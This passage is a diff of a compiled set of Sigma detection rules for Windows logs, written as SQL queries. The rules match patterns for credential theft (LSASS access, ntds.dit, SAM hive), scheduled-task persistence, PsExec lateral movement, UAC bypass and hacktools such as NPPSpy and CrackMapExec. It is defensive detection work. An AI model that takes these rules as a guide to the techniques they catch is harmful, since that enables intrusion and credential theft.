FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ @@ -36910,1242 +36932,1220 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1036.005", - "attack.defense_evasion" + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - 